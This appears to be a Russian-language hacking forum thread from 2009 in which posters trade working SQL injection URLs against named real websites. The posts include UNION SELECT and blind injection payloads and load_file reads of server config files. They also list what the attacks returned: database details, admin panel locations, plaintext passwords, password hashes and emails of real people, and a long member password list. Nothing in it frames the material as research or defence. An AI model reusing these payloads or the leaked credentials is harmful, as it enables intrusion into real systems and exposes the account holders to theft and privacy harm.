13.04.2009, 01:31
goon.ru - Pr-4 ТиЦ 2100
http://goon.ru/o/msg_view.htm?m_id=-1+union+select+1,2,3,4,5,concat_ws(user(),version( ),database()),7,8,9--+
goon_top@localhost:5.0.51a-community-log:goon_top
vimss.lbl.gov pr 6
http://vimss.lbl.gov/findings/selected_image.php?id=-9%20union%20select%201,concat_ws(0x23,user(),datab ase(),version()),3,4,5,6,7,8,9
test@localhost#vimss_WebContent#5.0.22
http://vimss.lbl.gov/admin - basic
Структура
17 :In database afcs_WebContent found table events
0 : id
1 : description
2 : startDate
3 : endDate
4 : startTime
5 : endTime
6 : event
7 : projects
8 : link
9 : archive
18 :In database afcs_WebContent found table presentations
0 : id
1 : title
2 : abstract
3 : presenter
4 : fundingSource
5 : venue
6 : date
7 : location
8 : link
9 : fileName
10 : passwordProtected
11 : topics
12 : lbnlNumber
13 : authors
14 : archive
19 :In database afcs_WebContent found table projects
0 : id
1 : project
2 : abbreviation
20 :In database afcs_WebContent found table publications
0 : id
1 : title
2 : abstract
3 : authors
4 : publishedYear
5 : publishedBy
6 : publishedPages
7 : publishedVolume
8 : publishedIssue
9 : link
10 : category
11 : topics
12 : status
13 : editor
14 : lbnlNumber
15 : fundingSource
16 : archive
21 :In database afcs_WebContent found table topics
0 : id
1 : topic
2 : date_added
22 :In database vimss_WebContent found table Images
0 : id
1 : title
2 : description
3 : authors
4 : fundingSource
5 : fileName
6 : passwordProtected
7 : topics
8 : archive
23 :In database vimss_WebContent found table events
0 : id
1 : description
2 : startDate
3 : endDate
4 : startTime
5 : endTime
6 : event
7 : projects
8 : link
9 : archive
24 :In database vimss_WebContent found table presentations
0 : id
1 : title
2 : abstract
3 : presenter
4 : fundingSource
5 : venue
6 : date
7 : location
8 : link
9 : fileName
10 : passwordProtected
11 : topics
12 : lbnlNumber
13 : authors
14 : archive
25 :In database vimss_WebContent found table projects
0 : id
1 : project
2 : abbreviation
26 :In database vimss_WebContent found table publications
0 : id
1 : title
2 : abstract
3 : authors
4 : publishedYear
5 : publishedBy
6 : publishedPages
7 : publishedVolume
8 : publishedIssue
9 : link
10 : category
11 : topics
12 : status
13 : editor
14 : lbnlNumber
15 : fundingSource
16 : archive
27 :In database vimss_WebContent found table topics
0 : id
1 : topic
2 : date_added
Юридическая фирма Консвел
http://www.conswel.ru/index.php?issue_id=66+and+ascii(substring((select+ login+from+users+limit+1),1,1))%3E1
DezMond™
13.04.2009, 15:05
http://www.symbianware.com/product.php?id=lneditor60&pl=-n6680'+union+select+1,2,concat_ws(0x3a3a,version() ,database()),4,5,6+/*+
4.1.20::symbi001
http://www.teamantigua.com/anuncio.php?cat=Apartments%20For%20Rent&nsc=$.%20350-850&id=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,TABLE_N AME,14,15+from+information_schema.tables--
http://www.video-2-cul.com/video-in.php?id=34848'+union+select+1,load_file('/var/www/vhosts/video-2-cul.com/httpdocs/bas.php'),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mys ql.user/*
админку не нашёл((
<<Kingspan>>
http://www.kingspan.ua/first.php?idsub=4&idsub1=210&idsub2=217&page=9999999999999+union+select+1,table_name,3+fro m+information_schema.tables--+
db:5.0.22-Debian_0ubuntu6.06.11-log
name_db: kingspanin
os: KINGSPAN - pc-linux-gnu
http://www.kingspan.ua/admin/
table: users
-=admins=-
login: admin
pass:maxmax504
+limit+x,x--+
[PR = 6] [SQL - 5]
http://www.itcdc.com/about.php?p=2+union+select+1,2,3,4/*
+from users
paivi:310b12fd78e579f77f570c334797fc46:Paivi:Salon en:paivi@esitemarketing.com:
310b12fd78e579f77f570c334797fc46:sucesso2006
[PR = 6] [SQL - 5]
http://www.ceskazbrojovka.com/index.php?idp=1&ids=3&lang=en&p=32+union+select+1--+
+from admins
emil:ae80d870eb40a8fd7c256c0ec3faf2ba511ba134:
rsvenda:d271892c3c27f69ce39784a06f95c7f30e667ece:
<<Рестораны Одессы "Волдай">>
http://www.valdai.com.ua/index.php?action=1&id=-4+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6--+
db: 4.0.27-standard
db_name: valdai_valdai
user: valdai_valdai@localhost
os: pc-linux-gnu
Tyc00n
PS: На сервере SAFE_MODE_ON + OPEN_BASE_DIRE_ON, Так что нечего там ловить
Ты не открыл для мну Америку.....
dr.Pilulkin
13.04.2009, 20:46
http://www.smartdesignworldwide.com/news/print.php?id=-53+union+select+1,2,3,user(),database(),version(), 7,8,9,10,11,12,13,14,15,16,17--
smart_dev@mona.dreamhost.com 5.0.67-userstats-log
+++AndreyDevil+++
13.04.2009, 20:59
http://www.borgosanfelice.com/eng/page.php?pid=-1'+union+select+1,2,3,4,5,6,7,8/*
Database Version: 5.0.45
Database name: borgosanfelice_it
User name: borgosanfelice.i@localhost
http://www.borgosanfelice.com/admin/index.php
admin : passwd
<<Путевки на отдых в турцию и Египет "Геотур">>
http://www.geo-tur.ru/country.php?id=-183+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7--+
db :5.0.45
name_db :romma_geotur
user :romma_geotur@localhost
os :pc-linux-gnu
http://www.geo-tur.ru/admin/
log: romma
pass: gthkby
+++AndreyDevil+++
13.04.2009, 21:20
http://www.gpdauto.com.au/inventory/product.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
Database Version: 4.1.22
Database name: gpdauto_com_au_-_1
User name: gpdauto@localhost
admin:J9HK27a
http://www.gpdauto.com.au/images/x_2.php
<<Меню ресторанов "RestorantHause">>
http://www.restaurant-house.ru/menu.php?menux=menu&id=-16+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6/*
db: 4.1.22
db_name: wwwrestaurant_houseru_ethnicus
user: restaura@bix.rbc.ru
os: portbld-freebsd7.0
+++AndreyDevil+++
13.04.2009, 21:37
http://www.annseward.co.uk/product.php?id=-1+union+select+1,version(),3,4,5--
Database Version: 5.0.67
Database name: annseward_co_uk_shop
User name: aseward@localhost
annseward:deerprint
ILYAtirtir
14.04.2009, 00:13
KIA CLUB,Клуб владельцев корейских автомобилей.
http://www.kia-club.ru/news.php?news_id=999'+union+select+concat_ws(0x3a, database(),user(),version()),2,3,4,5,6,7/*&i=1
kia-club_forum:root@localhost:5.0.45-log
http://www.kia-club.ru/news.php?news_id=999'+union+select+file_priv,2,3,4 ,5,6,7+from+mysql.user/*
Y
http://www.kia-club.ru/news.php?news_id=999'+union+select+1,aes_decrypt(a es_encrypt(load_file('/var/www/virtual/kia-club.ru/forum/config.php'),0x71),0x71),3,4,5,6,7+from+mysql.user/*
$dbms = 'mysqli';
$dbhost = '';
$dbport = '';
$dbname = 'kia-club_forum';
$dbuser = 'root';
$dbpasswd = 'kiaclub';
http://www.kia-club.ru/news.php?news_id=999'+union+select+1,aes_decrypt(a es_encrypt(load_file('/var/www/virtual/kia-shop.ru/cfg/connect.inc.php'),0x71),0x71),3,4,5,6,7+from+mysql .user/*
define('DBMS', 'mysql');
define('DB_HOST', 'localhost');
define('DB_USER', 'kia-shop');
define('DB_PASS', 'sale_kia');
define('DB_NAME', 'kia-shop');
define('ADMIN_LOGIN', 'admin');
http://www.kia-club.ru/news.php?news_id=999'+union+select+1,concat_ws(0x3 a,user,password,host),3,4,5,6,7+f
rom+mysql.user/*
root:364e3dd5302e4ff3:kiaclub:localhost
root::kia-club.ru
root:364e3dd5302e4ff3:kiaclub:127.0.0.1
root:364e3dd5302e4ff3:kiaclub:217.144.102.38
kia-shop:0ec649431b96a629:sale_kia:%
админ с форума
http://www.kia-club.ru/news.php?news_id=999'+union+select+1,concat_ws(0x3 a,username,user_password),3,4,5,6
,7+from+phpbb_users+where+user_id='2'/*
VladPowers:c93691d0365caf1294411787294bd1e3
windclub.ru
http://windclub.ru/index.php?id=4&cnt=1&pld=-10+union+select+1,2,3,4,5--
Database Version: 4.0.27-log
Database name: windclub_ru
User name: windclub_ru@zvm19.host.ru
обеденный завтрак =)
http://www.energy.ucf.edu/oeis/index.php?bid=903+order+by+999/*
User: root
Версия мускуля - 5.*
пхпинфо: http://www.sustainable.ucf.edu/test.php
пхпмайадмин:http://energy.ucf.edu/phpmyadmin/index.php
логин:пасс root:david1999
вперед;-)
+++AndreyDevil+++
14.04.2009, 12:28
http://www.irelandwesttours.com/tours-ireland-irish-gallery-details.php?id=-1+union+select+1,version(),3,4,5,6,7/*
Database Version: 5.0.45-community-log
Database name: nuatec1_irewestt
User name: nuatec1_tendent@web8.hosting365.ie
http://www.irelandwesttours.com/admin/
[0]:jim:в‘JґА
[1]:driver:�M5e�
[2]:market:µ;7�yУ
[3]:driver2:�M5e�ю
[4]:Majella:§‚п(щХ
[5]:marketing:в‘y»b+Ь
Классно вобще.........
erihtoney
14.04.2009, 13:36
http://az.meie.tv/ugroups.php?UID=2042+union+select+1,2,3,concat_ws( 0x2020,version(),database(),user()),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18
version: 4.1.22-standard-log
user: meietv_mysql@localhost
database: meietv_db
table: users
http://www.perodua.com.my/index.php?section=corporate&id=-8+union+select+concat_ws(0x3a,version(),database() ,user()),2--
4.1.22-standard-log:perodua_perodua2008:perodua_dbuser@localhost
[FreeMAN]
14.04.2009, 15:16
http://www.djilan.com.br/news.php?id=-142+union+select+1,table_name,3,4,5,6,7,8+from+inf ormation_schema.tables+limit+39,1
table: forum_users
MySQL: 5.0.45-log
http://xn--b1aecbgci6b0a.su/news.php?id=-119+union+select+1,table_name,3,4,5,6,7,8+from+inf ormation_schema.tables+limit+16,1
table: admsys_users
MySQL: 5.0.22
+++AndreyDevil+++
14.04.2009, 18:41
http://www.raysonicaudio.com/product_details.php?ID=-1+union+select+version(),2,3,4--
Database Version: 5.0.75-community-log
Database name: raysonic_raysonic
User name: raysonic_root@localhost
admin:646ee6e61356d77cf12b48cba91c08e4
mythsam:711c42921f07b0fb654c75e4519664d8
ILYAtirtir
14.04.2009, 18:48
Безопасность Информационных Технологий
http://www.security.ukrnet.net/modules/sections/index.php?op=listarticles&secid=12+union+select+1,2,concat_ws(0x3a,database( ),user(),version()),4,5,6,7&show=100
security_security:security_securit@ns3.adamant.net :4.0.25-standard
SOKIA Официальный дистрибьютор KIA motors в России
http://www.sokia.ru/news/id.1059+union+select+1,2,concat_ws(0x3a,database() ,user(),version()),4,5,6--
u11571_3:u11571_2@10.10.10.225:5.0.67-log
доступ к другим базам походу обрезан,но зато...
http://www.sokia.ru/news/id.-105+union+select+1,2,3,4,concat_ws(0x3a,login,pass wd),6+from+users+limit+0,1--
alef:63c7a431bc271b17bad04c2e9d4e0c4d:fela
cry:d23e1a969bce29409cb20d260c2497ff
supervisor:81f3b3fbcdb5f44ced86827ee6ae34d4
админка
http://www.sokia.ru/adm
<<Вагон ресторан>>
http://vagon-restoran.kiev.ua/gallery_big.php?id=-15+union+select+table_name,null+from+information_s chema.columns+where+column_name+like+chr(108)||chr (111)||chr(103)||chr(105)||chr(110)+limit+1+offset +2--*&setlang=rus
version(): PostgreSQL 8.2.5 on i386-portbld-freebsd5.5, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728
current_database(): lasoon_new_2
+++AndreyDevil+++
14.04.2009, 19:12
http://vimss.lbl.gov/findings/selected_image.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/*
Database Version: 5.0.22
Database name: vimss_WebContent
User name: test@localhost
<<Отель "NewSolarium">>
http://www.liogrand.ru/module.php?mod=show_hotels®ion=23&id=-189'+union+select+1,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4,5,6,7,8,9,0 ,1,2,3,4--+
db: 5.0.51a-log
name_db: udb3969
user: Uwww3969S@localhost
os: portbld-freebsd6.3
robots.txt
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
table: jos_users
-=admins=-
name: Administrator
login: admin
pass: 69425f70ba3d8e0078456801e2c89aa0 :(
name: SuperAdministrator
log: sadmin
pass: 8dd205691c63a13c977dca3ae9503bdb :(
-=users-=
+limit+x,x--+
rubnk.ru - Все Банки России - Адреса, телефоны, реквизитыhttp://rubnk.ru/index.php?banks=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,version(),user(),database(),@@version_compi le_os),14,15,16,17,18,19,20,21,22,23,24,25,26,27--5.0.51:us5003b@localhost:db5003a : portbld-freebsd6.2
316 таб:http://rubnk.ru/index.php?banks=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_na me,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ information_schema.tables-- ПредставителЬ ОДминов:http://rubnk.ru/index.php?banks=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,id,name,title,url,email,pwd,super,modules,l ang,ip),14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+db5003c.slaed_admins-- admin:ssu1981@mail.ru:723c21a96c20250cbc38eb829348 85d9
yurich:ssu1981@mail.ru:723c21a96c20250cbc38eb82934 885d9
<<@FOLLOW.RU"Познай себя и окружающих">>
http://www.follow.ru/print.php?id=-245'+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4--+
db: 5.0.67-log
name_db: u44427
user: u44427@10.10.223.205
os: unknown-freebsd6.3
http://www.follow.ru/admin/ бейсик авторизация
table: ibf_members
log: Camille
pass: 7fc09d631566141f8336bb0a43e83540 :(
+limit+x,x--
------------------------
------------------------
<<Казанская лингвистическая школа>>
http://kls.ksu.ru/boduen/bodart1_1.php?id=5+union+select+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7,8--+&num=18000000
db: 4.0.27-log
name_db: biblfil
user: filfak@localhost
os: pc-linux-gnu 4 6
http://www.kls.ksu.ru/admin/
www.metal-trade.ru
http://www.metal-trade.ru/board/?type=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,7,0,1, 2--
4.1.22:metall:root@localhost
root доступ
ТИЦ 2000
www.grif-r.ru
http://www.grif-r.ru/index.php?idpage=39&idgroup=4589+union+select+concat_ws(0x3a,version() ,database(),user())--
Database Version: 5.1.30-log
Database name: grif_r
User name: grif_r@localhost
admin:
grezz:yongwon
ТИЦ 1200
http://www.ehostit.net/index.php?id=565+union+select+concat(version(),0x3 a,database(),0x3a,user()),2,3,4--
user - ehostit@localhost
version - 5.0.51b-log
database - ehostit
http://www.fhdir.com/viewhost.php?id=74+union+select+concat(version(),0 x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11, 12--
version - 5.0.67-community
user - fhdir_fhdir@localhost
database - fhdir_fhdir
Table users
Columns username,hash
http://www.louisianasportsman.com/details.php?id=1226+union+select+1,2,concat(versio n(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37--
version - 5.0.51a-community
user - p0m3a6c8_Mk4Ftis@localhost
database - p0m3a6c8_site
.:[melkiy]:.
14.04.2009, 23:14
Международный фонд славянской письменности и культуры
http://www.slavfond.ru/index.php?l=en&p=news&id=-55+union+select+1,2,3,4,5,6,7,8,9--
Database Version: 5.0.67-log
Database name: u97969_ruscult
User name: u97969@10.10.223.238
Авторизация на сайте
ADMIN:M50173
CONCERT:19571092044
PRESS:M50173
http://www.mereda.org/pressrelease.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,1,12,13,14,15 ,16,17,18--
Database Version: 5.0.75-community-log
Database name: meredaor_meredadb
User name: meredaor_genuser@localhost
Авторизавция на http://www.mereda.org/login.php
Юзеры
ill Backman Knoth:member101
5Paul Phifer:member101
5Acadia Environmental Technology:member101
5Allied Engineering, Inc.:member101
5Allied / Cook Construction Company:member101
5Ames A/E:member101
5Amidon Appraisal, Co.:member101
5Anastos & Nadeau, Inc.:member101
5Androscoggin Bank:member101
5Androscoggin Valley Council of Governments (AVCOG):member101
5Anne D. Weigel Realtor:member101
5Atlantica Group, LLC:member101
5Audet Land Company, LLC:member101
5Avesta Housing:member101
5Bangor Savings Bank:member101
5Bangor Target Area Development Corporation:member101
5Bates Mill Limited Liability Company:member101
5Bath Savings Institution:member101
5Benchmark:member101
5Bernstein, Shur, Sawyer & Nelson:member101
5Bibeau & Company, LLC:member101
5Birmingham Management Corp.:member101
5Bramlie Development, LLC:member101
5Brockway Smith Company:member101
5C & T Management, Inc.:member101
5CCR Cost Segregation:member101
5CES, Inc.:member101
5CAIS Community Association Information Systems:member101
5Caleb Johnson Architects:member101
5Camden National Bank:member101
5Capital Servicing, Inc.:member101
5Cardente Real Estate:member101
5CB Richard Ellis / The Boulos Company:member101
5Chicago Title Insurance Company:member101
5CHR Realty / GMAC Real Estate:member101
5City North Development, LLC:member101
5City of Auburn, Maine:member101
5City of Bangor - Community & Econ. Dev. Dept.:member101
5City of Gardiner:member101
5City of Lewiston:member101
5City of Portland:member101
5City of Saco:member101
5City of Westbrook:member101
5Coastal Enterprises, Inc.:member101
5Coldwell Banker Residential Brokerage - Harper Lee Collins:member101
5Coldwell Banker Residential Brokerage - Gregory Hodgkins:member101
5Combined Management, Inc.:member101
5Commercial Properties, Inc.:member101
5Community Housing of Maine:member101
5CMCS, Inc.:member101
5Cook & Associates LLC:member101
5Corporate Finance Associates:member101
5Creative Office Pavilion:member101
5Credere Associates, LLC:member101
5Criterium Engineers:member101
5CUBE3 Studio:member101
5Curtis Thaxter Stevens Broder & Micoleau LLC:member101
5Cushman & Wakefield:member101
5Custom Built Homes of Maine:member101
5The Law Offices of Robert E. Danielson:member101
5Daigle Commercial Group:member101
5David Lakari & Associates, LLC:member101
5Dawson Commercial:member101
5Dead River Properties:member101
5Derivative Advisors, LLC:member101
5Developers Collaborative:member101
5DiBiase Appraisal Services, Inc.:member101
5DM Peterson, Inc.:member101
5Doyle Enterprises:member101
5Drummond Woodsum & MacMahon:member101
5Drummond & Drummond, LLP:member101
5East Brown Cow Management, Inc.:member101
5East End Corp.:member101
5Eastern Appraisal & Consulting, Inc.:member101
5Eaton Peabody Consulting Group:member101
5Efficiency Maine Business Program:member101
5Eldredge Lumber & Hardware/Atlantic Design Ctr.:member101
5Enterprise Business Park:member101
5Epstein Commercial Real Estate:member101
5Evergreen Communities, LLC:member101
5FFD Trust:member101
5Fidelity Title Company, Inc.:member101
5First American Title Insurance Co.:member101
5Fishman Realty Group:member101
5Five Islands Capital Management, LLC:member101
5Foothills Management:member101
5Fore River Company:member101
5Freeport Economic Development Corporation:member101
5Gawron Turgeon Architects:member101
5George Campbell & Associates:member101
5Gilbane Building Company:member101
5Goodwill Industries of Northern New England:member101
5Gorham Savings Bank:member101
5Gorrill-Palmer Consulting Engineers:member101
5Goulet & Associates, Inc.:member101
5Greater Franklin Development Corporation:member101
5Greater Portland Chambers of Commerce:member101
5Greater Portland Landmarks:member101
5Greystone Commercial Lending Resources:member101
5Guerette Engineering and Construction Svcs, Inc:member101
5BCC Group, LLC:member101
5GZA GeoEnvironmental Inc.:member101
5Haley & Aldrich, Inc.:member101
5Harborview Investments:member101
5Harborview Properties:member101
5HardyPond Construction:member101
5Harmon Property Management:member101
5Mattson Development, LLC :member101
5Harriman:member101
5Home Sellers:member101
5Homeport, Inc. dba Harbor Realtors:member101
5Housing Initiatives of New England:member101
5HRH Northern New England:member101
5Hudson Realty Capital, LLC:member101
5Insurance Consultants of Maine, Inc.:member101
5Irishspan Industries:member101
5Isis Development, LLC:member101
5Ivy Athletic Club:member101
5Jacques Whitford Company, Inc.:member101
5Jensen Baird Gardner & Henry:member101
5JorHan Real Estate, LLC:member101
5J.B. Brown & Sons:member101
5Kasprzak Builders, Inc.:member101
5Kennebunk Savings Bank:member101
5Key Environmental, Inc.:member101
5KGI Properties, LLC:member101
5KBE Building Corporation:member101
5Lakepoint Real Estate:member101
5Lambert Coffin:member101
5Blais Civil Engineers:member101
5Lawyers Title/Commonwealth:member101
5Landry Construction Corporation:member101
5Ledgewood Construction:member101
5Lestage Law Office, LLC:member101
5Lewiston-Auburn Economic Growth Council:member101
5MacDonald Associates:member101
5Macdonald Page & CO LLC:member101
5Magnusson Balfour Commercial & Business Brokers:member101
5MAI Environmental Services:member101
5Main Street Rehab & Property Management:member101
5Maine Association of Public Housing Directors:member101
5Maine Bank & Trust:member101
5Maine Chapter of the Appraisal Institute:member101
5Maine Commercial Financing, L.L.C.:member101
5Maine Real Estate Managers Association:member101
5Maine State Housing Authority:member101
5Maine Valuation Company:member101
5Mainebiz:member101
5Maineland Consultants:member101
5Malone Commercial Brokers, Inc.:member101
5Martin Dassa Real Estate Development:member101
5Meridian Mortgage Group:member101
5Middle Street Management, Inc.:member101
5Mike Eon Associates, Inc.:member101
5Monaghan Leahy, LLP:member101
5Moncure & Barnicle:member101
5Monks O'Neil Development, LLC:member101
5Monument Title Company:member101
5Moore Painting, Inc.:member101
5MS Consultants, LLC:member101
5MTC Enterprises, LLC:member101
5Murray Plumb & Murray:member101
5NAI The Dunham Group:member101
5National Kidney Foundation of Maine:member101
5Nauset Construction Corporation:member101
5North Atlantic Properties:member101
5Northeast Bank:member101
5Northeast Civil Solutions, Inc.:member101
5Northern New England Housing Investment Fund:member101
5Northland Enterprises, LLC:member101
5Northstar Aerial Photo:member101
5Norway Savings Bank:member101
5Oscar Company:member101
5Otis | Atwell:member101
5Ouellette & Associates, P.A.:member101
5P & W Real Estate:member101
5Packard Development, LLC:member101
5Paragon Commercial Real Estate:member101
5Patco Construction, Inc.:member101
5PDT Architects:member101
5Penquis Development, Inc.:member101
5People's Regional Opportunity Program (PROP):member101
5Perkins Thompson Hinckley & Keddy:member101
5Petruccelli, Martin & Haddow, LLP:member101
5Pierce Atwood:member101
5Pierce Atwood Consulting:member101
5Pierce & Associates:member101
5Pinkham & Greer Consulting Engineers, Inc.:member101
5Pizzagalli Construction Company:member101
5Planning Decisions, Inc.:member101
5Pressley Associates, Inc.:member101
5Preti, Flaherty, Beliveau & Pachios LLP:member101
5Priority Group:member101
5Properties Northeast:member101
5Protection One:member101
5Q10 | New England Realty Resources:member101
5Ram Harnden Commercial Real Estate Services:member101
5Ram Management Co., Inc.:member101
5Realty Finance Company:member101
5Right-Trak Design, Inc.:member101
5Rivergreen Bank:member101
5Rob Dog Realty:member101
5Robinson Consulting Services, LLC:member101
5Rosenberg Real Estate, LLC:member101
5Rudman & Winchell, LLC:member101
5Sanford Institution for Savings:member101
5Scarborough Economic Development Corp. (SEDCO):member101
5Sebago Technics, Inc.:member101
5Securitas Security Services USA, Inc.:member101
5Sevee & Maher Engineers, Inc.:member101
5SGC Engineering, LLC:member101
5Shawshank Stone:member101
5SMRT Architecture Engineering Planning:member101
5Society for Marketing Professional Services:member101
5STAG Capital Partners:member101
5Stantec Consulting Services, Inc.:member101
5St. Germain & Associates, Inc.:member101
5Summit Environmental / Geoengineering Services Inc:member101
5Sullivan Multi Family Realty:member101
5Swenson & Co.:member101
5Systems Engineering:member101
5SYTDesign Consultants:member101
5S.W. Cole Engineering, Inc.:member101
5TD Banknorth, N.A.:member101
5TEAM FLETCHER Coldwell Banker Millett Realty:member101
5The Haughey Company, Inc.:member101
5The Highlands:member101
5The Louis Berger Group, Inc.:member101
5The Olympia Companies:member101
5The Sheridan Corporation:member101
5The Szanton Company:member101
5Ticor Title Insurance Company:member101
5Tisdale Management Company:member101
5Tompkins, Clough, Hirshon & Langer PA:member101
5Tounge Associates:member101
5Town of Brunswick:member101
5Town of Falmouth:member101
5Town of Hampden:member101
5Town of Windham:member101
5Value Housing, Inc.:member101
5Verrill Dana, LLP:member101
5WBRC Architects Engineers:member101
5Webber Oil Company:member101
5Westbrook Housing:member101
5Whitten Properties:member101
5Wishcamper Properties, Inc.:member101
5Woodard & Curran:member101
5Wright-Pierce:member101
5Wright-Ryan Construction, Inc.:member101
5Terracon:member101
5Midcoast Regional Redevelopment Authority:member101
5New England Commercial Realty Advisors, Inc.:member101
5Consigli Construction Company, Inc.:member101
5Oak Engineers, LLC:member101
5TRC:member101
5WEICHERT, REALTORS ® - Waterglen Group:member101
5Shapiro Development:member101
5Ingalls Commercial Brokerage, Inc.:member101
5Maine Real Estate & Development Association:member101
5Nonesuch River Golf Club:member101
5York Housing Authority:member101
5Associated Builders and Contractors of Maine:member101
5Community Development Services, Inc.:member101
5Burdett Surveying and Mapping:member101
5Law Office of James B. Barns:member101
5Charles P Lape / Loan Officer:member101
5Haverlock, Estey & Curran:member101
5GEI Consultants:member101
5City of South Portland:member101
5Durkee, Brown, Viveiros & Werenfels Architects:member101
5Chip Lape Commercial Loans Services:member101
5Weston & Sampson:member101
5Fessenden GeoEnvironmental Services (FGS):member101
5Town of Cumberland:member101
5Unitil:member101
5Real Property Resolution Corporation:member101
5Carroll Associates Landscape Architects:member101
5Baseline Sustainability:member101
5R Blake Real Estate Services, LLC:member101
5Anthony Muench Landscape Architect:member101
5David A. Kamila Associates:member101
5Maine Coast Properties, Inc. :member101
5Saddleback Ski Resort:member101
5Sutherland Conservation & Consulting:member101
5Main-Land Development Consultants, Inc.:member101
5Bar Harbor Bank & Trust:member101
5Benchmark Residential & Investment Real Estate:member101
5Hissong Properties, LLC:member101
5Campbell Environmental Group:member101
5Butts Commercial Brokers:member101
5Town of Waterboro :member101
Имхо, админы:
lcaron: Skippy
sclark: mereda09
http://www.itec.com.ru/228/?id=135000%20union%20select%201,concat_ws(0x3A,tab le_schema,TABLE_NAME),3,4,5,6,7,8,9,10,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,44,45+FROM+I NFORMATION_SCHEMA.TABLES
http://www.itec.com.ru/228/?id=135000%20union%20select%201,password,3,4,5,6,7 ,8,login,10,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,44,45+FROM+users
admin:b32ceeb4083e2b830ef18a07e29af06a:gfhjkmlkzfl vbyf
Сайт : www.itec.com.ru
Хост : ns1.jpr.ru
IP-адрес : 83.102.226.211
кто подключится к мускулю отпишите плиз
http://www.antik1941.ru/new_catalog/?mode=descr&cat_id=&item_id=-4313+union+select+1,2,3,4,concat_ ws(0x3a,version(),database(),user(),@@version_comp ile_os),6,7,8,9,10,11,12,13,14,15--
Database Version : 4.0.27-standard
Database name : antik194_bcms
User name : antik194_antik@localhost
OS : pc-linux-gnu
-------------------------------------------------+
http://www.kachkov.net/news.php?s=-147+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15--
Database Version : 5.0.51a-community-log
Database name : kachkovn_vse
User name : kachkovn_kachkov@localhost
OS : redhat-linux-gnu
ILYAtirtir
15.04.2009, 05:00
Группа Русэлт
http://www.ruselt.ru/pointer.php?id=17&id1=99'+union+select+1,2,3,4,concat_ws(0x3a,data
base(),user(),version()),6,7,8,9+--+
u33206:u33206@10.10.153.179:5.0.67-log
http://www.ruselt.ru/pointer.php?id=17&id1=99'+union+select+1,2,3,concat_ws(0x3a,userna
me,password),5,6,7,8,9+from+admin+limit+0,1+--+
admnr:6ad4f36012bf40f4
админка
http://ruselt.ru/admin/index.php
Manpower Russia & Region
http://www.manpower.ru/job/search_vac.php?search=&v_id=2511+and+(version()+like+0x3325)
=> 3я ветка(version()=3.22.56)
http://www.manpower.ru/job/search_vac.php?search=&v_id=2511+and+ascii(substring(user(),1,1))=0x72
http://www.manpower.ru/job/search_vac.php?search=&v_id=2511+and+ascii(substring(user(),2,1))=0x6F
http://www.manpower.ru/job/search_vac.php?search=&v_id=2511+and+ascii(substring(user(),3,1))=0x6F
http://www.manpower.ru/job/search_vac.php?search=&v_id=2511+and+ascii(substring(user(),4,1))=0x74
user()=root
http://ladsinnantes.free.fr/see.php?id=-15+UNION+SELECT+1,2,3,4,5,6
Database Version: 5.0.67
Database name: ladsinnantes
User name: ladsinnantes@172.20.245.23
www.ocm.ru
http://www.ocm.ru/ru/press/index.php?id15=7442+union+select+1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8--
Database Version: 4.1.22
Database name: ummc
User name: ummc@localhost
<<he Information Security Writers Newsletter>>
http://www.infosecwriters.com/newmail/archive.php?id=-1+or+1=2+union+select+1,2,3,4,5,6,version(),8,9,0, 1,2,3,4,5,6,7,8,9--+&issueID=6
db: 4.1.22-standard
name_db: infosecw_swg
user: infosecw_infosec@localhost
os: pc-linux-gnu
http://www.infosecwriters.com/admin/ - бейсик авторизация
----------------------------------
----------------------------------
<<he Information Security Writers Newsletter>>
http://www.interaccess.org/axon/archive.php?id=-253+union+select+1,2,3,4,5,unhex(hex(table_name)), 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+fr om+information_schema.tables--+
db: 5.0.18-standard
name_db: interaccess
user: interaccess@localhost
os: pc-linux-gnu
table: wp_users
admin:14a7be4c58f5a0156fd0f3b0f72b9702:jess.brouse @interaccess.org
Walnut:d6e3fe9131eac608b29d3595362f6d89:walrushump @hotmail.com
Pixeldave:61b792a1f523eb066468102cd8895c76:david@p ixelgallery.org
Dana:51c98dc907a5284f95b34e75d7c71d3a:dana.samuel@ interaccess.org
Sarah T:c444b7b0f7c18759478b90b891125d9b:sarah.todd@inte raccess.org
Jess:a72e8f60241c4408bf35e15d21c05cd5:jess@brousia n.org
jennie:4d14966139da3bba25b8abc5ea9d5cc5:jennifer.c herniack@interaccess.org
